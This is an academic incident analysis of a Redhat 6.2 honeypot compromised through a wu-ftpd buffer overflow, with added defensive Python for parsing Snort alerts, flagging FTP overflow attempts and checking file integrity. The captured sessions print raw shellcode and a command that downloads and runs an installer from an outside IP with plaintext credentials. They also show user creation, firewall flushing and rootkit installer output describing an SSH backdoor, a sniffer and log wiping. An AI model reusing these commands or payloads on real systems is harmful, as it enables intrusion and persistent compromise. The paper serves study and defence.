
RESEARCH PAPERS

An Incident and Abuse Analysis of a Compromised Redhat 6.2 Honeypot

(1) Emran Mohd Tamil, (2) Abdul Hamid Othman

(1) Faculty of Computer Science and Information Technology, University of Malaya
(2) Faculty of Information Technology & Quantitative Sciences, Department of System and Computer Technology, Faculty of Computer Science and Information Technology, University of Malaya

(1) emran@um.edu.my, (2) hamido@tmsk.uitm.edu.my

Abstract
Honeypots are an emerging technology in computer security. Any networked computer attracts hackers who intentionally try to gain unauthorized access to it. A honeypot system is meant to be hacked in order to learn from it, or merely to serve as a deception mechanism. Within this research, we deployed several sets of honeynet architecture consisting of several operating systems as high interaction honeypots, connected to the internet via a TMNet Streamyx Home DSL connection and monitored by a monitoring station running Snort IDS. Among all the high interaction honeypots deployed, the Redhat 6.2 honeypot is one of the most interesting because it was successfully penetrated by a hacker who then abused it to launch attacks against other hosts. The honeypot was also used as a bot server for several IRC channels. This paper discusses the details of the hacker's activity within the deployed honeypot.

Keywords: high interaction honeypot, honeynet, buffer overflow in Redhat 6.2

1. INTRODUCTION

According to David Raikow, one trick favoured by hunters since prehistoric times still proves useful in the world of digital networks: bait. Security specialists often construct systems that appear vulnerable to attack, but actually offer no access to valuable data, administrative controls, or other computers. These machines, known as honeypots, are intended to be attacked, have no legitimate data, and are there to lure attackers away from valuable network hosts, to collect data for research or legal action, and to alert administrators of any attacks in progress [1].

Lance Spitzner, a leading honeypot expert, describes a honeypot as "a security resource whose value lies in it being probed, attacked or compromised." This means that whatever has been designated as a honeypot is expected to be probed, attacked, and potentially exploited [2]. The honeypot is a resource that pretends to be a real attack target, and the data gathered will provide information about both the attack and the attacker [3].

Within this research, we deployed several operating systems to gather information about what could happen to a normal home user's computer connected to a DSL Internet connection. There were several interesting results from the experiments. This paper discusses a hacker's activity on our Redhat 6.2 honeypot.

2. SCOPE OF THE RESEARCH & THIS PAPER

The data collected is limited to the honeypot implemented. The results only identify and analyze attacks against the honeypot. The honeypots are connected to a home Streamyx user account. The honeypot follows the honeypot implementation guide proposed by the Honeynet Project [4]. The analysis is limited to identifying the attacks by protocol, port targeted and services targeted, as well as the tactics, exploits and vulnerabilities associated with them. The Snort IDS architecture is used to detect and identify any intrusion attempt towards the honeypot. Ethereal is used to capture the network traffic to allow better analysis. For the purpose of this paper, only the analysis related to one of the honeypots deployed (Redhat 6.2) is discussed.

3. RESEARCH METHODOLOGY

The subsections below elaborate the research methodology implemented in this research.

3.1. Methodology overview
Data is collected from a network sensor that resides within the same broadcast domain as the computer that is connected to the Internet via DSL. A real operating system is connected to a DSL network. The decoy system has a similar configuration to that of normal home DSL users. The IP address of the honeypot is not promoted in any way. This decoy system has no protection from the internet (i.e. no firewall) and is monitored to detect any suspicious activities or attacks against it. The monitoring station collects the network traffic that flows towards the honeypot to analyze whether there are any suspicious activities towards the honeypot. Several measures have been taken to ensure its invisibility, such as modifying the registry and using a modified version of a UTP cable.

JASA 3 | July 2007 29


In the end, there are two sets of data available from the monitoring station. The first is the alert data reported by Snort: the raw data is interpreted using a web based Snort interpreter, ACID. The second set is the raw network packet data collected by Ethereal in tcpdump format. The data is analyzed to check for any signs of attack or intrusion.

3.2. Data collection overview
The architecture built for this honeypot is similar to the generation two honeypot architecture proposed by the Honeynet Project, except that the invisibility of the monitoring station is enhanced and the data control feature is removed.

RedHat 6.2 (Server), installed with the anonymous ftp server enabled, is used as one of the honeypot hosts. The operating system's network setting must use the network settings from the DSL router (DMZ IP address, gateway and DNS server).

The data control feature is a way to contain the hacker's activities to avoid the hacker's misuse of the honeypot to attack other networks, as the liability would fall on the honeypot operator. Some examples of data control techniques are connection limiting (limiting the outbound connections from the honeypot), an outbound firewall (disallowing outbound connections) or even traffic mangling [4]. Data control is not implemented due to limited resources, as it would need an additional system to act as the data control (firewall) system. Removing the data control requires the honeypot operator to monitor their honeypot from time to time to avoid abuse. But the removal of the data control feature ensures that intruders have nothing to be suspicious about, therefore the possibility to capture more data becomes higher.

The architecture designed consists of a honeypot, a data collection system, a hub, a DSL router and a DSL modem. The honeypot and the data collection system are connected to the hub so they are in the same broadcast domain. All traffic is visible to both of them, as they use a layer one hub. The honeypots are put in the DMZ, so that any traffic to the IP associated with the router is routed to them.

The OS chosen for the data collection system is Windows XP due to its stability and the availability of tools for the OS. It is important to ensure that the data collection system is invisible, while at the same time being able to monitor the network traffic flowing from and into the honeypot. To improve the invisibility, the registry of Windows XP has been modified so that the computer has no network (IP) configuration. The steps to modify the registry are taken from the Snort website. Therefore the computer will not generate any network traffic but will still be able to sniff the network traffic.

To make the monitoring station even more invisible, the UTP cable has been modified so that there is only one-way traffic (receive only). This method completely eliminates the possibility of the monitoring station generating any traffic that could alert an attacker to its presence.

Figure 1 Honeypot Architecture (diagram not reproduced in the text; it shows the Internet connected through the ADSL modem and ADSL router (192.168.0.1) to the Demilitarized Zone (DMZ) with the honeypot on a static IP 192.168.0.x behind an Ethernet hub, and the Data Collection Centre attached to the hub by the modified one-way UTP cable (receive only): a Windows XP sniffer server with its registry modified to have no IP, used for monitoring/analysis and running Snort (IDS), Ethereal (network packet collector), MySQL (alert database) and ACID (data interpreter))

The network traffic is collected by Ethereal. The format of the network traffic saved by Ethereal is the standard tcpdump format. Tcpdump is the de facto format for storing network traffic [5].

To simplify detection, an IDS is installed. Snort IDS is chosen as the IDS software for this setup. Snort is a lightweight network intrusion detection system developed by Martin Roesch. It is based on the libpcap packet capture library commonly used in many TCP/IP sniffers and analyzers. Snort is a rule-based network IDS. Snort rules consist of known attack signatures and commands. The content of each network packet is compared against hundreds of known attack signatures to detect traffic that may contain identified malicious content [6].

The details of the software used in the monitoring station are as follows:
• Snort 2.01 Build 88 with default install
• Acid 0.9.6b23
• ActivePerl 5.6.1.635 MSWin32 x86
• adodb360
• apache 2.0.47-win32-x86-no_ssl
• jpgraph-1.12.1
• mysql 4.0.13 win
• php4 win32
• phplot-4.4.6
• WinPcap 3.0

3.3. Honeypot Operation Setup
The honeypot architecture is set up in homes with DSL accounts. The DSL account package used is provided by TMNet. The package used to connect the honeypot is the minimum package, with a modem provided by the ISP, at the speed of 384 KB per second, at RM88/month.

The architecture is then connected to the internet. The setup runs continuously until certain conditions are met. It will run as long as possible to get more accurate data. However, the setup may stop for certain reasons such as blackouts, internet service downtime by the ISP, and abuse by attackers.

The data collection process begins as soon as the setup is connected to the internet. Any network traffic into and from the honeypot is recorded in tcpdump format by Ethereal. Simultaneously, the process of identifying possible intrusions is done by the Snort IDS software. Any attack detected is logged and written to the MySQL database. Other than these two data collection processes, the forensic analysis of the compromised honeypot will also contribute to the data collection process. However, this research is mainly focused on the data collected in the network traffic.

In analyzing the data, support software is used. Ethereal is used to read and interpret network traffic. Ethereal is a free network protocol capture and analyzer for UNIX and Windows. However, the process of reading the network traffic packet by packet is lengthy and would need a long time to produce any findings. This is where the data reported by Snort is used as a starting point to investigate the network traffic.

The Snort IDS software may only log detected alerts into a raw log file or into a database. The open source version does not include any GUI software to interpret the alert log. This is where ACID fits in. ACID is a PHP application that can produce statistics from alerts generated by Snort. Descriptive analysis is used to interpret the data. The software is capable of generating graphs.

4. INITIAL RESULTS
The subsections below elaborate on the results.

4.1. Duration of honeypot uptime

Table 1: Duration of honeypot uptime

Honeypot     Start Date   Stop Date    Length   IP assigned
Redhat 6.2   2003-12-19   2003-12-23   4 days   219.95.189.49

Redhat 6.2 is the 3rd honeypot and the shortest running honeypot, with 4 days from 2003-12-19 until 2003-12-23. As stated in the methodology, the honeypot is connected to the DSL connection uninterrupted for as long as possible in order to get the most data (which results in more accurate statistics) unless stopped for some reason. In this case, the Redhat 6.2 honeypot was immediately stopped after we detected that it was being used as a stepping stone for reconnaissance activity (port scanning).

Table 2: Redhat 6.2 Attack Listing

Signature                                 Classification             Total
FTP login activity                        Unclassified               8 (0%)
FTP download files activity               Unclassified               12 (0%)
SCAN SOCKS Proxy attempt                  attempted-recon            216 (1%)
SCAN Proxy (8080) attempt                 attempted-recon            86 (0%)
SCAN Squid Proxy attempt                  attempted-recon            80 (0%)
BAD-TRAFFIC tcp port 0 traffic            misc-activity              96 (0%)
FTP RNFR ././ attempt                     misc-attack                150 (1%)
FTP CWD overflow attempt                  attempted-admin            2 (0%)
FTP wu-ftp bad file completion attempt    misc-attack                2 (0%)
FTP command overflow attempt              protocol-command-decode    2 (0%)
ICMP Broadscan Smurf Scanner              attempted-recon            13774 (95%)
WEB-IIS nsiislog.dll access               web-application-activity   2 (0%)

4.2. Snort Attack Log Analysis
This honeypot recorded 14430 alerts, under 12 types of alert comprising 7 categories. Only 18 source IPs were recorded, with 12 destination ports targeted.

This honeypot registered 14430 alerts, of which 13774 (95%) were the ICMP Broadscan Smurf Scanner. Based on the Snort rule documentation, ICMP echo requests are used to determine if a host is running at a specific IP address. A remote attacker can scan a large range of hosts using ICMP echo requests to determine which hosts are operational on the network.

As shown in Figure 2, due to the ICMP broadscan scanner launched by the attacker, the attempted-recon category is extremely high compared to the other classifications.

Figure 2: Signature Classification for Redhat 6.2 (chart not reproduced in the text)
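Table 2 and Figure 2 are what ACID produced from Snort's alert database. The same breakdown can be derived directly from Snort's line-oriented "fast" alert log, which is useful when no database is available, and the log also yields the one number ACID's per-signature view does not make obvious: how many alerts have the honeypot itself as the source. That outbound activity is what the authors report as the signal that led them to shut the honeypot down (section 5.3.1). The following Python is an added example, not the paper's tooling: it parses fast-format alert lines, builds the signature and classification listing with percentages, and counts outbound alerts per target. The alert lines are constructed for the example: the signature and classification names are those of Table 2, the gid:sid:rev numbers are placeholders rather than real Snort rule IDs, and the 203.0.113.x addresses are fictitious scan targets.

```python
import re
from collections import Counter

# Honeypot address from Table 1.
HONEYPOT_IP = "219.95.189.49"

# Snort "fast" alert format, one alert per line. The classification and the
# source/destination ports are optional (ICMP alerts carry no ports).
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) \[\*\*\] "
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.+?) \[\*\*\] "
    r"(?:\[Classification: (?P<cls>[^\]]+)\] )?"
    r"\[Priority: (?P<prio>\d+)\] \{(?P<proto>\w+)\} "
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))? -> (?P<dst>[\d.]+)(?::(?P<dport>\d+))?$"
)

# Constructed sample alerts, not the paper's data set. Signature and
# classification names follow Table 2; the gid:sid:rev numbers are
# placeholders, not real Snort rule IDs; 203.0.113.x hosts are fictitious.
SAMPLE_ALERTS = """\
12/19-02:11:05.103200 [**] [1:900001:1] FTP RNFR ././ attempt [**] [Classification: misc-attack] [Priority: 2] {TCP} 203.197.136.8:3127 -> 219.95.189.49:21
12/19-02:11:06.221870 [**] [1:900002:1] FTP CWD overflow attempt [**] [Classification: attempted-admin] [Priority: 1] {TCP} 203.197.136.8:3127 -> 219.95.189.49:21
12/19-02:11:06.229910 [**] [1:900003:1] FTP wu-ftp bad file completion attempt [**] [Classification: misc-attack] [Priority: 2] {TCP} 203.197.136.8:3127 -> 219.95.189.49:21
12/19-02:11:06.230500 [**] [1:900004:1] FTP command overflow attempt [**] [Classification: protocol-command-decode] [Priority: 3] {TCP} 203.197.136.8:3127 -> 219.95.189.49:21
12/19-03:02:44.010000 [**] [1:900005:1] FTP login activity [**] [Priority: 3] {TCP} 203.197.136.8:3201 -> 219.95.189.49:21
12/19-05:40:01.000120 [**] [1:900006:1] ICMP Broadscan Smurf Scanner [**] [Classification: attempted-recon] [Priority: 2] {ICMP} 219.95.189.49 -> 203.0.113.10
12/19-05:40:01.000340 [**] [1:900006:1] ICMP Broadscan Smurf Scanner [**] [Classification: attempted-recon] [Priority: 2] {ICMP} 219.95.189.49 -> 203.0.113.11
12/19-05:40:01.000560 [**] [1:900006:1] ICMP Broadscan Smurf Scanner [**] [Classification: attempted-recon] [Priority: 2] {ICMP} 219.95.189.49 -> 203.0.113.12
12/19-05:40:01.000780 [**] [1:900006:1] ICMP Broadscan Smurf Scanner [**] [Classification: attempted-recon] [Priority: 2] {ICMP} 219.95.189.49 -> 203.0.113.13
12/19-07:15:30.500000 [**] [1:900007:1] SCAN SOCKS Proxy attempt [**] [Classification: attempted-recon] [Priority: 2] {TCP} 203.0.113.77:4412 -> 219.95.189.49:1080
"""


def parse_alerts(text):
    """Parse fast-format alert lines into dicts; blank lines are skipped."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ALERT_RE.match(line)
        if m is None:
            raise ValueError("unparsable alert line: " + line)
        rec = m.groupdict()
        rec["cls"] = rec["cls"] or "Unclassified"   # ACID shows these as Unclassified
        alerts.append(rec)
    return alerts


def attack_listing(alerts):
    """Rows of (signature, classification, count, percent) like Table 2,
    most frequent first."""
    total = len(alerts)
    counts = Counter((a["msg"], a["cls"]) for a in alerts)
    rows = [(msg, cls, n, round(100.0 * n / total)) for (msg, cls), n in counts.items()]
    return sorted(rows, key=lambda r: (-r[2], r[0]))


def classification_totals(alerts):
    """Alert count per classification (the data behind Figure 2)."""
    return dict(Counter(a["cls"] for a in alerts))


def outbound_alerts(alerts, honeypot_ip=HONEYPOT_IP):
    """Alerts whose source is the honeypot itself: it is scanning or attacking
    someone else, which is the abuse signal that ended this deployment."""
    return [a for a in alerts if a["src"] == honeypot_ip]


def summary(text, honeypot_ip=HONEYPOT_IP):
    """Headline figures of the kind section 4.2 reports, plus the outbound view."""
    alerts = parse_alerts(text)
    out = outbound_alerts(alerts, honeypot_ip)
    return {
        "total": len(alerts),
        "signatures": len({a["msg"] for a in alerts}),
        "classifications": len({a["cls"] for a in alerts}),
        "sources": sorted({a["src"] for a in alerts}),
        "dest_ports": sorted({int(a["dport"]) for a in alerts if a["dport"]}),
        "outbound": len(out),
        "outbound_targets": sorted({a["dst"] for a in out}),
    }


if __name__ == "__main__":
    for msg, cls, n, pct in attack_listing(parse_alerts(SAMPLE_ALERTS)):
        print(f"{msg:42} {cls:25} {n:6} ({pct}%)")
    print(summary(SAMPLE_ALERTS))
```

In a live deployment the `outbound` count is the figure to alert on: a honeypot with no data control should generate no alerts in which it is the source, so any non-zero value means the operator has to pull the plug, exactly as happened here.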

5. REDHAT 6.2 HACKER'S ATTACK OBSERVATION AND DESCRIPTION

5.1. Overview
The Redhat 6.2 honeypot was hacked within the first day. The attacker entered the server using a buffer overflow against the wu-ftp server version 2.6.0. After successfully adding a username and installing a rootkit (a set of programs that replace the most common system programs in favour of the attacker and automatically erase log files to hide their presence), the attacker used the honeypot as his base to launch several attacks and reconnaissance activities. Some of them included actively scanning the internet to find vulnerable ftp servers, launching IRC bot servers, and broadscan smurf attacks. The complete activity is profiled in the attack description section.

5.2. Supporting data
The next listing shows partial data extracted from the tcpdump file, showing how the attacker gained entry into the server via the ftp server buffer overflow. The data was captured using Ethereal, as the attacker used clear text communication formats (ftp, telnet, irc) for the intrusion and abuse processes. The least important data was snipped (shown as "(snipped)") as the whole set of data is too long. Some explanations are provided alongside.
included actively scanning the internet to find vulnerable ftp


Buffer overflow: flooding the FTP server with long character strings

220 localhost.localdomain FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.
RNFR ././
350 File exists, ready for destination name
(snipped)
PWD
257 "/" is current directory.
CWD 00000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000ðÿÿÿÿÿÿüÿÿÿÿÿÿ”á
__xý _ëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëë
ëëëëëëëëëëëëëëëëëëëë 1ÛC¸
tQ
-____P‰áj_X‰ÂÍ€ë_1Û÷ãþÊYj_XÍ€ë_èíÿÿÿÿÿÿ
550 00000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000ðÿÿÿüÿÿÿ”á__xý
_ëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëë
ëëëëëëëëëëëëëëë 1ÛC¸
tQ
-____P‰áj_X‰ÂÍ€ë_1Û÷ãþÊYj_XÍ€ë_èíÿÿÿ: File name too long.
CWD ~/{.,.,.,.}
(snipped)

Attacker installs some script, checks who is online, then adds user raul before flushing all firewall rules

CWD ~{
sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±_hÿ../Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€ncftpget -u xlogicus -p dupa16ani 206.253.222.88 . 'xlogic.tgz';tar zxvf xlogic.tgz;cd xl;./install;
w
12:37am up 2 days, 16:17, 1 user, load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     tty1     -                 Fri 8am  2days  0.43s  0.33s -bash
/usr/sbin/adduser raul
passwd raul
a
a
Changing password for user raul
passwd: all authentication tokens updated successfully
/sbin/ipchains -F
/sbin/iptables -F
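Because the FTP control channel is clear text, the indicators that Snort matched in Table 2 (RNFR ././, the CWD overflow, the command overflow) can be checked directly in the captured command stream, without a signature engine. The following Python is an added example, not code from the paper: it parses the client side of an FTP control-channel transcript and flags an anonymous login, the RNFR ././ probe, oversized or non-printable path arguments, and shell-glob metacharacters in path arguments, then gives the session a verdict. The transcript it runs on is constructed to mirror the session above; its non-ASCII tail is an arbitrary stand-in rather than the captured payload, and the 255-byte argument limit is an assumed threshold, not a value from the paper.

```python
import re

# Constructed client-side FTP control-channel transcript modelled on the
# session in section 5.2. It is bytes because an overflow payload is not
# valid text; the non-ASCII tail is an arbitrary stand-in, not the captured
# payload.
SAMPLE_SESSION = (
    b"USER ftp\r\n"
    b"PASS mozilla@\r\n"
    b"RNFR ././\r\n"
    b"PWD\r\n"
    b"CWD " + b"0" * 300 + b"\xf0\xff\xff\xff\xfc\xff\x94\xe1\r\n"
    b"CWD ~/{.,.,.,.}\r\n"
    b"CWD ~{\r\n"
    b"QUIT\r\n"
)

MAX_ARG_LEN = 255                      # assumed sane upper bound for a path argument
GLOB_RE = re.compile(rb"[{}*?\[\]]")   # shell-style globbing metacharacters
GUEST_USERS = {b"ftp", b"anonymous"}
PATH_VERBS = {b"CWD", b"LIST", b"NLST", b"RETR", b"STOR", b"DELE", b"RNFR", b"RNTO"}


def parse_commands(raw):
    """Split the client side of an FTP control channel into (verb, arg) pairs."""
    commands = []
    for line in raw.split(b"\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(b" ")
        commands.append((verb.upper(), arg))
    return commands


def analyse_session(raw):
    """Return findings as (command_index, tag, detail) tuples, in order seen."""
    findings = []
    for i, (verb, arg) in enumerate(parse_commands(raw)):
        if verb == b"USER" and arg.lower() in GUEST_USERS:
            findings.append((i, "guest-login", arg.decode()))
        if verb == b"RNFR" and arg == b"././":
            findings.append((i, "rnfr-probe", "RNFR ././ (Table 2 signature)"))
        if len(arg) > MAX_ARG_LEN:
            findings.append((i, "long-arg", f"{verb.decode()} argument of {len(arg)} bytes"))
        if any(b < 0x20 or b > 0x7E for b in arg):
            findings.append((i, "binary-arg", f"non-printable bytes in {verb.decode()} argument"))
        if verb in PATH_VERBS and GLOB_RE.search(arg):
            findings.append((i, "glob-arg", f"glob metacharacters in {verb.decode()} argument"))
    return findings


def verdict(findings):
    """overflow-attempt: an oversized argument carrying binary data;
    suspicious: any other indicator; clean: nothing flagged."""
    tags = {tag for _, tag, _ in findings}
    if "long-arg" in tags and "binary-arg" in tags:
        return "overflow-attempt"
    return "suspicious" if tags else "clean"


if __name__ == "__main__":
    found = analyse_session(SAMPLE_SESSION)
    for index, tag, detail in found:
        print(f"command {index}: {tag}: {detail}")
    print("verdict:", verdict(found))
```

A guest login on its own is normal for an anonymous FTP server and only rates "suspicious"; it is the combination of an oversized argument with bytes outside the printable range, which no legitimate path ever contains, that marks the session as an overflow attempt.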

The next data, extracted with Ethereal, shows the telnet communication initiated after the previous entry. This telnet session shows the attacker downloading a rootkit from a GeoCities ftp account and then installing the rootkit.

Connecting to the Yahoo FTP server containing the rootkit

ftp -v 66.218.65.72
Connected to 66.218.65.72.
220-Welcome to the Yahoo! Web Hosting FTP server.
220-Need help? Get all details at:
220-http://help.yahoo.com/help/us/webhosting/gftp/
220-
220-No anonymous logins accepted.
220 Yahoo!
Name (66.218.65.72:raul): rr0v0vvv bbb1b1_s_sefvefv vv
331-Enter your Yahoo! member password
331
Password: (snipped)
230-You are using 1.6% of your subscribed disk space
230 You have 541.222 MB of space available
Remote system type is UNIX.
Using binary mode to transfer files.
(snipped)
Retrieve file ---> RETR raul.tgz
150 Opening BINARY mode data connection for /r0bb1_sev/raul.tgz (438592 bytes).
(snipped)

Rootkit installation process

./setu./setpup
(snipped)
[0m
[0;32mStarting Rootkit Instalation .... [0m
[1;31mMakeing Home Directory And Copying Programs ... [0m
[0;32msniffer ... [0m
[0;32mcuratare ... [0m
[1;31mDone With Directorys & Programs ... [0m
[1;31mRemoveing Original Files ... [0m
[1;31mAnd Replaceing With Ours ... [0m
ls: /usr/bin/socklist: No such file or directory
ls: /usr/bin/socklist: No such file or directory
cp: ../utils/siz: No such file or directory
ls: /usr/bin/socklist: No such file or directory
ls: /usr/bin/socklist: No such file or directory
[1;31mCopying SSH Files ... [0m
[0;32msshd_config ... [0m
[0;32mssh_host_key ... [0m
[0;32mssh_random_seed ... [0m
[0;32msshd ... [0m
[1;31mDone With SSH Files ... [0m
[1;31mCreating Startup Files ... [0m
[1;31mStarting SSHD Backdoor & Sniffer ... [0m
[1;31mDone ... [0m
[1;31mGathering System Info & Sending Mail... [0m
[1;31mDone ... [0m
[1;31mRemoveing Our Tracks ... [0m
[1;32m[D] [O] [N] [E] ... [0m
[1;32m
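The installer output above shows the rootkit removing original system programs, replacing them with its own, dropping an sshd backdoor and a sniffer, and finally removing its tracks. The host-side check a defender wants against this is a file-integrity baseline taken before the system is exposed and kept off the host. The following Python is an added example, not code from the paper or from the rootkit: it builds a manifest of SHA-256 digest, size and permission bits for every regular file under a directory, and verifies a tree against a stored manifest, reporting modified, missing and added files. The `demo()` function runs it on a constructed toy tree in a temporary directory (the file names and contents are made up) and mimics the changes the installer describes.

```python
import hashlib
import json
import os
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each regular file under root (relative path) to its digest, size
    and permission bits. Symlinks are skipped."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.stat(full)
            manifest[os.path.relpath(full, root)] = {
                "sha256": sha256_file(full),
                "size": st.st_size,
                "mode": st.st_mode & 0o7777,
            }
    return manifest


def verify(root, manifest):
    """Compare the tree under root with a previously saved manifest."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "added": sorted(p for p in current if p not in manifest),
    }


def _write(root, rel, data, mode=0o755):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)
    os.chmod(path, mode)


def demo():
    """Constructed scenario (toy tree, made-up contents): baseline the tree,
    then mimic what the installer output in section 5.2 describes (replace
    binaries, drop a sniffer, clear a log) and verify against the baseline."""
    with tempfile.TemporaryDirectory() as root:
        for rel in ("bin/ls", "bin/ps", "bin/netstat", "usr/sbin/sshd"):
            _write(root, rel, b"original " + rel.encode())
        _write(root, "var/log/messages", b"Dec 19 02:11:05 ftpd: ANONYMOUS FTP LOGIN\n", 0o644)
        # Serialised as it would be when stored off the host; a copy left on
        # the honeypot is within the rootkit's reach.
        stored = json.dumps(build_manifest(root))

        _write(root, "bin/ps", b"trojaned ps that hides the attacker's processes")
        _write(root, "bin/netstat", b"trojaned netstat that hides the backdoor port")
        os.chmod(os.path.join(root, "bin/ls"), 0o700)      # permission change only
        _write(root, "usr/bin/.sniffer", b"dropped sniffer binary")
        os.remove(os.path.join(root, "var/log/messages"))    # "Removeing Our Tracks"

        return verify(root, json.loads(stored))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The check is only as trustworthy as the environment it runs in: once the rootkit has replaced ls, ps and netstat, any tool run on the compromised host, this one included, is reading the filesystem through code the attacker controls, so the verification belongs on a forensic workstation against a disk image, which is the approach the paper's forensic analysis of the honeypot takes.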

It is also interesting that the honeypot has been used as an IRC bot server. The bot joined several channels like #NovaMusic, #sock, #socklist, #selekt and lots more. The data shows IRC communication in several channels. The language of the communication is unknown but it is believed to be Romanian, as searching the web for the IRC communication phrases returns several Romanian sites. The data in the appendix shows the initial connection and communication recorded of the bot's connection to the IRC server.

:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :lasama sa vb cu Stere-
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :loool
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :are multi ma Stere-
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic ::))
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :stai asa ca`ti zic yo cati are
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :ll
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :lol
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :nexa
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :de unde sa am mah
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic ::)
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG #NOVAmusic :parca nu stii
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :16 are
:ryz!~ryz@ryz.users.undernet.org PRIVMSG #Reject : ACTION m-a ferit de foc si apa am s-o iubesc viata toata m-a ferit de ce a
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :lolz
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :ba nexa
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :ce esti bulangiu
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :da FrIZz
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :zi adevaru ca am 1 2 sau 3
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :lol
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :asa sunt yo ma
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :nu nu

:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :ia bagai si la mine
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :tnpqyw is tnpqyw@81.196.129.135 * HelloWorld
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :asta`i unu
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG #NOVAmusic :si cred ca`s de win
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic ::)
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :lolz
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :tu ce zici
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :da
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :zii
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :zi si mie unde imi fac si eu un root
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :sau un shell
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :nu stiu nana
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :te costa
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :am 3000000 $
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :ma doaren pola
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG #NOVAmusic :::P))

5.3. Other Observations

5.3.1. Detection
Initial detection was through Snort and the extensive outbound connections initiated from the honeypot. However, the analysis concentrates on the network packets collected by Ethereal in tcpdump format, as all the attacker's activities are recorded there. Most data is extracted via Ethereal.

5.3.2. Source of attack
The IP that is initially used in the attack is 203.197.136.8. A query at APNIC shows that the IP address belongs to an ISP company in India. The next source IP, which the attacker used to log in using the telnet program, is 213.233.97.236. The search shows that this IP belongs to an ISP in Romania.

This further supports the theory that the attacker uses several bases as launch pads from all over the world to cover his tracks and preserve his anonymity. Intruders usually keep several computers under their control, called step-through hosts, from which they access other computers [7].

5.3.3. Evidence of Active Targeting
As the attacker used only ftp related exploits to gain entry, coupled with the fact that the honeypot has an ftp server, this shows active targeting. Furthermore, the honeypot then sends an email stating the honeypot's info to the hacker's email.

The honeypot is also used as the launch pad for reconnaissance and IRC activity. This is definitely active targeting.

5.3.4. Severity
The severity of this attack is quite high, as the honeypot was used as a base by the attacker. If the honeypot was used to launch attacks against other networks, then the honeypot operator may be liable for any damage caused.

5.3.5. The probability that the Source Address was spoofed
There is no possibility that the source address used to penetrate and to connect to the honeypot was spoofed, as the full three-way TCP handshake was completed in every case.

5.4. Attack description

